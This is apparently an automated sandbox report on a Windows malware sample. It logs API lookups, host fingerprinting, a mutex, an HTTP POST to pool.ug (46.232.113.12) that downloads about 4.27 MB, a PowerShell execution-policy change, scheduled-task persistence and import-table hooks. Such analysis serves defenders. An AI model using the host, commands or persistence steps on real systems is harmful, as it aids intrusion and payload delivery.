Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdiplusStartup, address_out = 0x72cb5600 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdiplusShutdown, address_out = 0x72cb56be True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipCreateBitmapFromHBITMAP, address_out = 0x72cc6671 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipGetImageEncodersSize, address_out = 0x72cd2203 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipGetImageEncoders, address_out = 0x72cd228c True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipDisposeImage, address_out = 0x72cc4cc8 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipSaveImageToStream, address_out = 0x72cc4153 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = GetHGlobalFromStream, address_out = 0x756041d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x76c34173 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalMemoryStatus, address_out = 0x76c38b6d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReleaseMutex, address_out = 0x76c3111e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentDirectoryW, address_out = 0x76c35611 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableW, address_out = 0x76c389f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x76c31b48 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCurrentDirectoryW, address_out = 0x76c41260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalMemoryStatusEx, address_out = 0x76c5d4c4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDllDirectoryW, address_out = 0x76cb004f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocalTime, address_out = 0x76c35aa6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RemoveDirectoryW, address_out = 0x76cb44cf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDriveStringsA, address_out = 0x76c3e4dc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x74d540e6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = LookupAccountSidA, address_out = 0x74d81daa True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreateProcessAsUserW, address_out = 0x74d4c592 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CheckTokenMembership, address_out = 0x74d4df04 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyW, address_out = 0x74d52459 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumValueW, address_out = 0x74d548cc True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextA, address_out = 0x74d491dd True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumDisplayDevicesW, address_out = 0x74f7e567 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wvsprintfA, address_out = 0x74f6aad3 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetKeyboardLayoutList, address_out = 0x74f62e69 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x771effc1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectA, address_out = 0x753f49e9 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestA, address_out = 0x753f4c7d True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersA, address_out = 0x753edcd2 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestA, address_out = 0x754618f8 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCrackUrlA, address_out = 0x753dd075 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetSetOptionA, address_out = 0x753e75e8 True 1
Fn
User (3)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 3
Fn
Keyboard (1)
»
Operation Additional Information Success Count Logfile
Get Info type = 0, result_out = 4 True 1
Fn
System (258)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 3
Fn
Get Time type = System Time, time = 2019-05-13 17:23:02 (UTC) True 1
Fn
Get Time type = Ticks, time = 162303 True 1
Fn
Get Time type = Performance Ctr, time = 22423470182 True 1
Fn
Get Time type = System Time True 249
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Operating System True 2
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = A6CF1546B-343A2EC6-63D8DC88-FF4A8C5D-82A11F69 True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 259 bytes
Total Data Received 4.27 MB
Contacted Host Count 1
Contacted Hosts 46.232.113.12
HTTP Session #1
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 259 bytes
Data Received 4.27 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /1/index.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request url = pool.ug/1/index.php True 1
Fn
Data
Read Response size = 65636, size_out = 9406 True 1
Fn
Data
Read Response size = 65636, size_out = 3464 True 1
Fn
Data
Read Response size = 65636, size_out = 908 True 1
Fn
Data
Read Response size = 65636, size_out = 65564 True 1
Fn
Data
Read Response size = 65636, size_out = 8816 True 1
Fn
Data
Read Response size = 65636, size_out = 3464 True 1
Fn
Data
Read Response size = 65636, size_out = 62188 True 1
Fn
Data
Read Response size = 65636, size_out = 65588 True 1
Fn
Data
Read Response size = 65636, size_out = 1524 True 1
Fn
Data
Read Response size = 65636, size_out = 65564 True 3
Fn
Data
Read Response size = 65636, size_out = 61440 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 43824 True 1
Fn
Data
Read Response size = 65636, size_out = 65564 True 1
Fn
Data
Read Response size = 65636, size_out = 45268 True 1
Fn
Data
Read Response size = 65636, size_out = 65564 True 1
Fn
Data
Read Response size = 65636, size_out = 43808 True 1
Fn
Data
Read Response size = 65636, size_out = 3464 True 1
Fn
Data
Read Response size = 65636, size_out = 65571 True 1
Fn
Data
Read Response size = 65636, size_out = 43312 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 7364 True 1
Fn
Data
Read Response size = 65636, size_out = 40880 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 42348 True 1
Fn
Data
Read Response size = 65636, size_out = 3472 True 1
Fn
Data
Read Response size = 65636, size_out = 908 True 1
Fn
Data
Read Response size = 65636, size_out = 65548 True 1
Fn
Data
Read Response size = 65636, size_out = 45283 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 46784 True 1
Fn
Data
Read Response size = 65636, size_out = 2920 True 2
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 45324 True 1
Fn
Data
Read Response size = 65636, size_out = 5840 True 1
Fn
Data
Read Response size = 65636, size_out = 8760 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 43864 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 54084 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 52615 True 1
Fn
Data
Read Response size = 65636, size_out = 2920 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 48244 True 1
Fn
Data
Read Response size = 65636, size_out = 2920 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 57004 True 1
Fn
Data
Read Response size = 65636, size_out = 52560 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 2984 True 1
Fn
Data
Read Response size = 65636, size_out = 3472 True 1
Fn
Data
Read Response size = 65636, size_out = 65626 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 4
Fn
Data
Read Response size = 65636, size_out = 40648 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 7364 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 59924 True 1
Fn
Data
Read Response size = 65636, size_out = 2920 True 1
Fn
Data
Read Response size = 65636, size_out = 49640 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 4444 True 1
Fn
Data
Read Response size = 65636, size_out = 58400 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 3
Fn
Data
Read Response size = 65636, size_out = 54212 True 1
Fn
Data
Read Response size = 65636, size_out = 8760 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 58464 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 2
Fn
Data
Read Response size = 65636, size_out = 65627 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 7556 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 21964 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 8
Fn
Data
Read Response size = 65636, size_out = 9824 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 3
Fn
Data
Read Response size = 65636, size_out = 35662 True 1
Fn
Data
Read Response size = 65636, size_out = 0 True 1
Fn
Close Session - True 1
Fn
Process #11: powershell.exe
0 0
»
Information Value
ID #11
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\
Monitor Start Time: 00:01:42, Reason: Child Process
Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:03:01
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x86c
Parent PID 0x6d0 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 868
0x 84C
0x 848
0x 844
Process #12: taskeng.exe
0 0
»
Information Value
ID #12
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {A9833FF7-6F72-4DC6-BD4D-B3A90059795D} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:47, Reason: Created Scheduled Job
Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:02:56
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x838
Parent PID 0x36c (Unknown)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 834
0x 830
0x 82C
0x 828
0x 824
0x 820
0x 81C
Process #13: eb54.tmp.exe
795 0
»
Information Value
ID #13
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\eb54.tmp.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe" --Task
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:48, Reason: Child Process
Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:02:56
OS Process Information
»
Information Value
PID 0x818
Parent PID 0x838 (c:\windows\system32\taskeng.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 814
0x 8D0
0x 8B8
0x 8B4
0x B0
0x 900
0x 904
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000580000:+0x5567d 2. entry of eb54.tmp.exe 4 bytes kernel32.dll:LoadLibraryW+0x0 now points to private_0x000000007fff0000:+0x9c22b0c
...
IAT private_0x0000000000580000:+0x5567d 3. entry of eb54.tmp.exe 4 bytes kernel32.dll:TerminateThread+0x0 now points to private_0x000000007fff0000:+0x433cf85d
...
IAT private_0x0000000000580000:+0x5567d 4. entry of eb54.tmp.exe 4 bytes kernel32.dll:WritePrivateProfileStructW+0x0 now points to private_0x000000007fff0000:+0x9115d8b
...
IAT private_0x0000000000580000:+0x5567d 5. entry of eb54.tmp.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x610184d
...
IAT private_0x0000000000580000:+0x5567d 7. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0xbf97d8b
...
IAT private_0x0000000000580000:+0x5567d 8. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x79040c45
...
IAT private_0x0000000000580000:+0x5567d 12. entry of eb54.tmp.exe 4 bytes kernel32.dll:LocalAlloc+0x0 now points to pagefile_0x0000000000680000:+0x21573
...
IAT private_0x0000000000580000:+0x5567d 13. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetProfileStringA+0x0 now points to private_0x000000007fff0000:+0xbf975ff
...
IAT private_0x0000000000580000:+0x5567d 18. entry of eb54.tmp.exe 4 bytes kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0xb8074f3
...
IAT private_0x0000000000580000:+0x5567d 19. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x78841446
...
IAT private_0x0000000000580000:+0x5567d 20. entry of eb54.tmp.exe 4 bytes kernel32.dll:lstrcpyA+0x0 now points to private_0x000000007fff0000:+0xb087208
...
IAT private_0x0000000000580000:+0x5567d 25. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x568c02eb
...
IAT private_0x0000000000580000:+0x5567d 26. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetDriveTypeW+0x0 now points to private_0x000000007fff0000:+0x5fd458b
...
IAT private_0x0000000000580000:+0x5567d 27. entry of eb54.tmp.exe 4 bytes kernel32.dll:DuplicateHandle+0x0 now points to private_0x000000007fff0000:+0xb2274c0
...
IAT private_0x0000000000580000:+0x5567d 28. entry of eb54.tmp.exe 4 bytes kernel32.dll:GlobalMemoryStatus+0x0 now points to private_0x000000007fff0000:+0x4004085d
...
IAT private_0x0000000000580000:+0x5567d 33. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x3a7be850
...
IAT private_0x0000000000580000:+0x5567d 40. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetConsoleMode+0x0 now points to private_0x000000007fff0000:+0x4e8c02eb
...
IAT private_0x0000000000580000:+0x5567d 41. entry of eb54.tmp.exe 4 bytes kernel32.dll:FlushFileBuffers+0x0 now points to private_0x000000007fff0000:+0x519458b
...
IAT private_0x0000000000580000:+0x5567d 42. entry of eb54.tmp.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x69850fc0
...
IAT private_0x0000000000580000:+0x5567d 47. entry of eb54.tmp.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to private_0x000000007fff0000:+0x7a83e850
...
IAT private_0x0000000000580000:+0x5567d 48. entry of eb54.tmp.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0x44840001
...
IAT private_0x0000000000580000:+0x5567d 49. entry of eb54.tmp.exe 4 bytes kernel32.dll:TlsGetValue+0x0 now points to pagefile_0x00000000009a0000:+0x134e90c
...
IAT private_0x0000000000580000:+0x5567d 54. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x000000007fff0000:+0x6b0f8b04
...
IAT private_0x0000000000580000:+0x5567d 55. entry of eb54.tmp.exe 4 bytes kernel32.dll:InterlockedDecrement+0x0 now points to private_0x000000007fff0000:+0x3cf8b02
...
IAT private_0x0000000000580000:+0x5567d 64. entry of eb54.tmp.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x6b178b04
...
IAT private_0x0000000000580000:+0x5567d 65. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetTickCount+0x0 now points to private_0x000000007fff0000:+0x3d78b02
...
IAT private_0x0000000000580000:+0x5567d 69. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x7c76ff0c
...
IAT private_0x0000000000580000:+0x5567d 72. entry of eb54.tmp.exe 4 bytes kernel32.dll:WriteConsoleA+0x0 now points to private_0x000000007fff0000:+0x69420c8d
...
IAT private_0x0000000000580000:+0x5567d 75. entry of eb54.tmp.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x315468b
...
IAT private_0x0000000000580000:+0x5567d 78. entry of eb54.tmp.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x7884d68b
...
IAT private_0x0000000000580000:+0x5567d 79. entry of eb54.tmp.exe 4 bytes kernel32.dll:VirtualAlloc+0x0 now points to private_0x000000007fff0000:+0xb057208
...
IAT private_0x0000000000580000:+0x5567d 80. entry of eb54.tmp.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0xb03eb0e
...
IAT private_0x0000000000580000:+0x5567d 84. entry of eb54.tmp.exe 4 bytes user32.dll:EndPaint+0x0 now points to private_0x000000007fff0000:+0xd20048d
...
IAT private_0x0000000000580000:+0x5567d 86. entry of eb54.tmp.exe 4 bytes user32.dll:EnumDisplaySettingsA+0x0 now points to private_0x000000007fff0000:+0xc00ff72
...
IAT private_0x0000000000580000:+0x5567d 87. entry of eb54.tmp.exe 4 bytes user32.dll:DrawTextExW+0x0 now points to private_0x000000007fff0000:+0x44841446
...
IAT private_0x0000000000580000:+0x5567d 90. entry of eb54.tmp.exe 4 bytes user32.dll:SetPropA+0x0 now points to private_0x000000007fff0000:+0x568c02eb
...
IAT private_0x0000000000580000:+0x5567d 92. entry of eb54.tmp.exe 4 bytes user32.dll:LoadImageA+0x0 now points to private_0x000000007fff0000:+0xb0f8b0e
...
IAT private_0x0000000000580000:+0x5567d 93. entry of eb54.tmp.exe 4 bytes user32.dll:DestroyCursor+0x0 now points to private_0x000000007fff0000:+0xd541445
...
Host Behavior
File (504)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Open - - False 498
Fn
Module (281)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load WINMM.dll base_address = 0x74af0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 1
Fn
Load OLEAUT32.dll base_address = 0x75220000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x74b50000 True 1
Fn
Load WS2_32.dll base_address = 0x75bc0000 True 1
Fn
Load DNSAPI.dll base_address = 0x74a80000 True 1
Fn
Load CRYPT32.dll base_address = 0x759b0000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 12
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\eb54.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe, size = 260 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74af26e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
